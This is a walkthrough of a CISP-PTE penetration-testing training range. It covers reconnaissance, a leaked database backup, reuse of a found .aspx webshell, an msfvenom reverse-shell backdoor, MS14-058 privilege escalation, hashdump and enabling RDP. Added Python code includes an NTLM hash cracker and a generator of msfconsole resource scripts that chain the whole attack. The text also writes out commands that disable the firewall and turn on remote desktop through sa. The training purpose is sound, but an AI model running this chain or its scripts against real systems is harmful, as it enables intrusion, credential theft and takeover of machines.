CISP-PTE Comprehensive Range Walkthrough: Full Exploitation with msf and MS14-058 [Range Environment Included]
Preface
If you need the range environment, send the message [pte range] to the account in the background. There is also a network security study group, which you can join from the menu bar.
Information gathering
The task: given one IP, find 3 KEYs.
Start with an nmap scan. To save time, narrow the port range here instead of running a full -p- scan; the target's web service sits on a port above 20000.
The scan turns up that port; browse to it.
Directory scanning with Yujian (御剑).
There is a robots.txt (crawler protocol file).
Visit the backend (admin) login page.
Check for a .git leak: the request returns an IIS error page, so the server runs IIS.
Check for backup files. There is one.
Open it: it contains a database account and password.
Connecting with the SQL Server client failed; I don't know why, it should be a problem with my own system.
So connect with PyCharm Professional's database tool instead, specifying the database, host, user, port and password.
There are 4 tables.
Find the administrator's password in them.
Log in to the backend with it: the first KEY is right there.
Web vulnerability exploitation
File upload: nothing outside the allowed types gets through, so the check is whitelist-based; a different approach is needed.
This is where the real analysis starts.
Here the uploaded files are managed through an .aspx file.
Download it and look at it: it is a one-line webshell (一句话木马), obviously.
Request the file at the path found in the source.
Try passing it a parameter.
Connect with AntSword.
View the system information.
Check the system configuration and try to change a password: no privileges.
Back in the web directory there is a file holding the second KEY.
Post-exploitation
Start Kali and set its network adapter to bridged mode.
Generate a backdoor with msfvenom and note down the payload (and the LHOST/LPORT) you used; a sticky note is enough.
Start msfconsole.
Use the multi/handler module.
The generated backdoor file is on Kali, which has no AntSword, so first pull it to this (Windows) machine and then push it from here to the target. On Kali, serve the file over HTTP with Python 3's http.server.
From the local machine, browse to Kali's IP on that port. If the page does not load, the most likely cause is that Kali's firewall is blocking port 8888; open it with the following command:
sudo ufw allow 8888/tcp
After downloading it, upload the file to the target with AntSword.
Execute the backdoor from AntSword's virtual terminal.
The reverse shell comes back.
Check the system information and privileges: still an unprivileged user.
Privilege escalation
1. MS14-058
Once the session is up, bg backgrounds it so you can keep running other modules; the session list then shows the session with its ID. Note that ID. Next, search windows/local/ms14_058.
Select the search result with use 0.
That is the ms14_058 module. Its SESSION option must be set to the session you just obtained, otherwise the exploit fails. Then run.
A pitfall here: a wrongly configured port.
The target is vulnerable, yet no new session is established. The cause is the port setting: the LPORT of the module's payload must be the same port the msfvenom backdoor was built with, otherwise it will not succeed! (One possible explanation, which the write-up does not examine, is that Kali's firewall only lets through the port the backdoor already calls back to, so a different default LPORT is silently dropped.)
Reset LPORT to the one used with msfvenom. Most tutorials online do not go into this detail and just go through the motions; I hit a lot of pitfalls myself before I realised it.
Escalation succeeded. Use hashdump to dump the users' password hashes.
Crack the hashes (NTLM hashes are not decrypted; they are matched offline against candidate passwords).
Enable 3389 (Remote Desktop):
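The hash-cracking step above, as an added example that is not part of the original write-up: it parses meterpreter hashdump lines (user:rid:lmhash:ntlmhash:::) and tries a wordlist against the NTLM hashes. NTLM is MD4 over the UTF-16-LE password, so nothing is decrypted; candidates are hashed and compared. A pure-Python MD4 is included because hashlib's md4 is missing on OpenSSL 3 builds of Python. The dump lines and the wordlist are constructed for the example and are not the range's real data.

```python
"""Added example, not part of the original write-up: parse meterpreter
hashdump output and crack the NTLM hashes offline with a wordlist.
NTLM is MD4 over the UTF-16-LE password, so a hash is never "decrypted";
candidates are hashed and compared. A pure-Python MD4 is included because
hashlib's md4 is unavailable on OpenSSL 3 builds of Python. The dump lines
and wordlist below are constructed for this example, not taken from the range.
"""
import struct

_MASK = 0xFFFFFFFF


def _md4(data: bytes) -> bytes:
    """MD4 as in RFC 1320; sufficient for NTLM, not for anything else."""
    def rotl(x, n):
        return ((x << n) | (x >> (32 - n))) & _MASK

    def f(x, y, z):
        return (x & y) | (~x & z)

    def g(x, y, z):
        return (x & y) | (x & z) | (y & z)

    def h(x, y, z):
        return x ^ y ^ z

    # (mixing function, additive constant, message-word order, shift amounts)
    rounds = (
        (f, 0x00000000, tuple(range(16)), (3, 7, 11, 19)),
        (g, 0x5A827999, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
        (h, 0x6ED9EBA1, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
    )
    # Padding: 0x80, zeros up to 56 mod 64, then the bit length as 64-bit little-endian.
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        v = list(state)
        for func, k, order, shifts in rounds:
            for i, w in enumerate(order):
                v[0] = rotl((v[0] + func(v[1], v[2], v[3]) + x[w] + k) & _MASK, shifts[i % 4])
                v = [v[3], v[0], v[1], v[2]]  # next step operates on the register just behind
        state = [(s + t) & _MASK for s, t in zip(state, v)]
    return struct.pack("<4I", *state)


def ntlm_hex(password: str) -> str:
    """NTLM hash as hashdump prints it (lowercase hex)."""
    return _md4(password.encode("utf-16-le")).hex()


EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM field when no LM hash is stored


def parse_hashdump(text: str):
    """Each hashdump line is user:rid:lmhash:ntlmhash::: ; return the usable entries."""
    entries = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or len(parts[3]) != 32:
            continue
        entries.append({"user": parts[0], "rid": int(parts[1]),
                        "lm_stored": parts[2].lower() != EMPTY_LM,
                        "ntlm": parts[3].lower()})
    return entries


def crack(entries, wordlist):
    """Map user -> password for every NTLM hash that the wordlist (plus the
    empty password) reproduces. Hash the candidates once, then look up."""
    table = {ntlm_hex(w): w for w in [""] + list(wordlist)}
    return {e["user"]: table[e["ntlm"]] for e in entries if e["ntlm"] in table}


# Constructed sample: an admin with a weak password, a Guest with no password,
# and one hash the wordlist does not cover.
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
web:1001:aad3b435b51404eeaad3b435b51404ee:ffffffffffffffffffffffffffffffff:::
"""
SAMPLE_WORDLIST = ["123456", "password", "Admin@123"]

if __name__ == "__main__":
    for user, pw in crack(parse_hashdump(SAMPLE_DUMP), SAMPLE_WORDLIST).items():
        print(f"{user}: {pw!r}")
```

For a real dump, swap SAMPLE_WORDLIST for a wordlist file and feed anything left uncracked to hashcat (mode 1000); the 31d6cfe0... value is the well-known hash of an empty password and needs no cracking at all.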
run post/windows/manage/enable_rdp
The site's root directory also contains a .bak file dated 2022-12-12.
Open it: it holds the SQL Server sa (super administrator) account and password.
With this sa account, run a command through the admin/mssql/mssql_exec module to turn off the firewall.
It executes. If the firewall is left on, the remote desktop connection may be refused.
The remote desktop opens.
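The msf side of the procedure above (the handler for the msfvenom backdoor, the MS14-058 local exploit with the matching LPORT, hashdump and enable_rdp on the SYSTEM session, and mssql_exec with the sa account) as a set of msfconsole resource scripts, with a check for the port pitfall described earlier. This is an added example, not code from the write-up. The IP addresses, port, session IDs and sa password are placeholders, not the range's real values.

```python
"""Added example, not from the original write-up: generate msfconsole
resource scripts for the MS14-058 path from one set of callback values and
check them before running. The pitfall in the text is that the LPORT used by
the ms14_058 local exploit must equal the port the msfvenom backdoor was built
with, so both come from the same variables here.

Assumptions (placeholders): Kali's bridged IP 192.168.1.10, callback port 4444,
target 192.168.1.20, the low-privilege session ID from `sessions -l`, the
SYSTEM session ID the exploit creates, and the sa password from the .bak file.
"""
import re

PAYLOAD = "windows/meterpreter/reverse_tcp"


def msfvenom_cmd(lhost, lport, out="shell.exe"):
    """Command that builds the backdoor the web shell will execute."""
    return f"msfvenom -p {PAYLOAD} LHOST={lhost} LPORT={lport} -f exe -o {out}"


def handler_rc(lhost, lport):
    """Listener for the msfvenom payload, started as a background job."""
    return "\n".join([
        "use exploit/multi/handler",
        f"set PAYLOAD {PAYLOAD}",
        f"set LHOST {lhost}",
        f"set LPORT {lport}",
        "exploit -j",
        "",
    ])


def privesc_rc(lhost, lport, session):
    """Run once the low-privilege session is up and backgrounded with bg.
    SESSION is the ID from `sessions -l`; LPORT is the msfvenom port."""
    return "\n".join([
        "use exploit/windows/local/ms14_058_track_popup_menu",
        f"set SESSION {session}",
        f"set PAYLOAD {PAYLOAD}",
        f"set LHOST {lhost}",
        f"set LPORT {lport}",
        "run",
        "",
    ])


def post_rc(system_session):
    """After the SYSTEM session arrives: dump hashes and enable RDP on it."""
    return "\n".join([
        f"sessions -i {system_session} -C hashdump",
        "use post/windows/manage/enable_rdp",
        f"set SESSION {system_session}",
        "run",
        "",
    ])


def mssql_firewall_rc(rhost, sa_password, cmd="netsh firewall set opmode disable"):
    """sa through auxiliary/admin/mssql/mssql_exec, used in the write-up to
    turn the firewall off before connecting over RDP."""
    return "\n".join([
        "use auxiliary/admin/mssql/mssql_exec",
        f"set RHOSTS {rhost}",
        "set USERNAME sa",
        f"set PASSWORD {sa_password}",
        f"set CMD {cmd}",
        "run",
        "",
    ])


def check_ports(venom_cmd, *rcs):
    """True only when every `set LPORT` in the scripts equals the port baked
    into the msfvenom command; a mismatch is the failure described above."""
    venom_port = int(re.search(r"LPORT=(\d+)", venom_cmd).group(1))
    return all(int(p) == venom_port
               for rc in rcs
               for p in re.findall(r"^set LPORT (\d+)$", rc, re.M))


if __name__ == "__main__":
    lhost, lport = "192.168.1.10", 4444
    venom = msfvenom_cmd(lhost, lport)
    scripts = {"handler.rc": handler_rc(lhost, lport),
               "privesc.rc": privesc_rc(lhost, lport, session=1),
               "post.rc": post_rc(system_session=2),
               "mssql.rc": mssql_firewall_rc("192.168.1.20", "sa-password")}
    assert check_ports(venom, *scripts.values())
    print(venom)
    for name, body in scripts.items():
        with open(name, "w") as fh:
            fh.write(body)
        print(f"wrote {name}; run it with: msfconsole -q -r {name}")
```

Run the scripts in order (handler first, privesc once the first session is listed, post once the SYSTEM session is listed); each stage's session ID has to be read from the console, which is why they are separate files rather than one script.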
2. Manual method
Once the sa password is known, log in as sa.
Run a system command through SQL Server (typically via xp_cmdshell). The command runs under the SQL Server service account, which here is SYSTEM, so sa effectively has SYSTEM privileges.
Turn off the firewall (the netsh firewall context is deprecated on newer Windows in favour of netsh advfirewall, but it still works on this target):
netsh firewall set opmode mode=disable
Enable 3389 remote connection
wmic rdtoggle where servername="%computername%" call setallowtsconnections 1
Port 3389 is now open.
Success. The existing user's password is not known, but you can create a new user and log in remotely with it. Here is another way:
Read the KEY directly from the command line.